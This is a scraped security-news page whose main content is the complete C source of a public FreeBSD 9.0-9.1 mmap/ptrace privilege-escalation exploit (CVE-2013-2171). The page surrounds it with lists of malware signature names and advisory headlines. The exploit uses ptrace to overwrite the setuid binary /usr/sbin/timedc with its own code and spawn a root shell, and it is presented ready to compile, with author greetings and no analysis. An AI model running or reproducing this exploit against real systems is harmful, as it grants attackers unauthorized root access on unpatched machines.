|
Security Bulletins
Latest Malware Updates
Downloader.Busadom!g102/27/2015Infostealer.Posteal02/26/2015Downloader.Busadom02/26/2015Trojan.Ladocosm02/26/2015SONAR.SuspDocRun02/25/2015SONAR.SuspHelpRun02/25/2015W32.Tempedreve.D!inf02/25/2015SONAR.PUA!AlnadInsta02/25/2015SONAR.Infostealer!g502/25/2015SONAR.Infostealer!g402/25/2015 |
06/21/2013
FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation ExploitCVE: CVE-2013-2171/* * FreeBSD 9.{0,1} mmap/ptrace exploit * by Hunger <fbsd9lul@hunger.hu> * * Happy Birthday FreeBSD! * Now you are 20 years old and your security is the same as 20 years ago... :) * * Greetings to #nohup, _2501, boldi, eax, johnny_b, kocka, op, pipacs, prof, * sd, sghctoma, snq, spender, s2crew and others at #hekkcamp: * I hope we'll meet again at 8@1470n ;) * * Special thanks to proactivesec.com * */ #include <err.h> #include <errno.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <sys/stat.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/wait.h> #define SH "/bin/sh" #define TG "/usr/sbin/timedc" int main(int ac, char **av) { int from_fd, to_fd, status; struct stat st; struct ptrace_io_desc piod; char *s, *d; pid_t pid; if (geteuid() == 0) { setuid(0); execl(SH, SH, NULL); return 0; } printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n"); printf("by Hunger <fbsd9lul@hunger.hu>\n"); if ((from_fd = open(av[0], O_RDONLY)) == -1 || (to_fd = open(TG, O_RDONLY)) == -1) err(1, "open"); if (stat(av[0], &st) == -1) err(2, "stat"); if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) || (d = mmap(NULL, (size_t)st.st_size, PROT_READ, MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED) err(3, "mmap"); if ((pid = fork()) == -1) err(4, "fork"); if (!pid) { if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1) err(5, "ptraceme"); return 0; } if (ptrace(PT_ATTACH, pid, NULL, 0) == -1) err(6, "ptattach"); if (wait(&status) == -1) err(7, "wait"); piod.piod_op = PIOD_WRITE_D; piod.piod_offs = d; piod.piod_addr = s; piod.piod_len = st.st_size; if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1) err(8, "ptio"); execl(TG, TG, NULL); return 0; } |
Security Advisories Database
Remote Code Execution Vulnerability in Microsoft OpenType Font DriverA remote attacker can execute arbitrary code on the target system. 07/21/2015Multiple Vulnerabilities in Linux kernel03/04/2015SQL Injection Vulnerability in PiwigoSQL inection vulnerability has been discovered in Piwigo. 02/05/2015Cross-site Scripting Vulnerability in DotNetNukeA cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke. 02/05/2015Cross-site Scripting Vulnerability in Hitachi Command SuiteA cross-site scripting vulnerability was found in Hitachi Command Suite. 02/02/2015Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk HandlingAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-ForwardsAn attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in MalwareBytes Anti-Exploit "mbae.sys"An attacker can perform a denial of service attack. 01/30/2015Denial of service vulnerability in Linux Kernel spliceAn attacker can perform a denial of service attack. 01/29/2015Denial of service vulnerability in Python Pillow Module PNG Text Chunks DecompressionAn attacker can perform a denial of service attack. 01/20/2015 |
The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
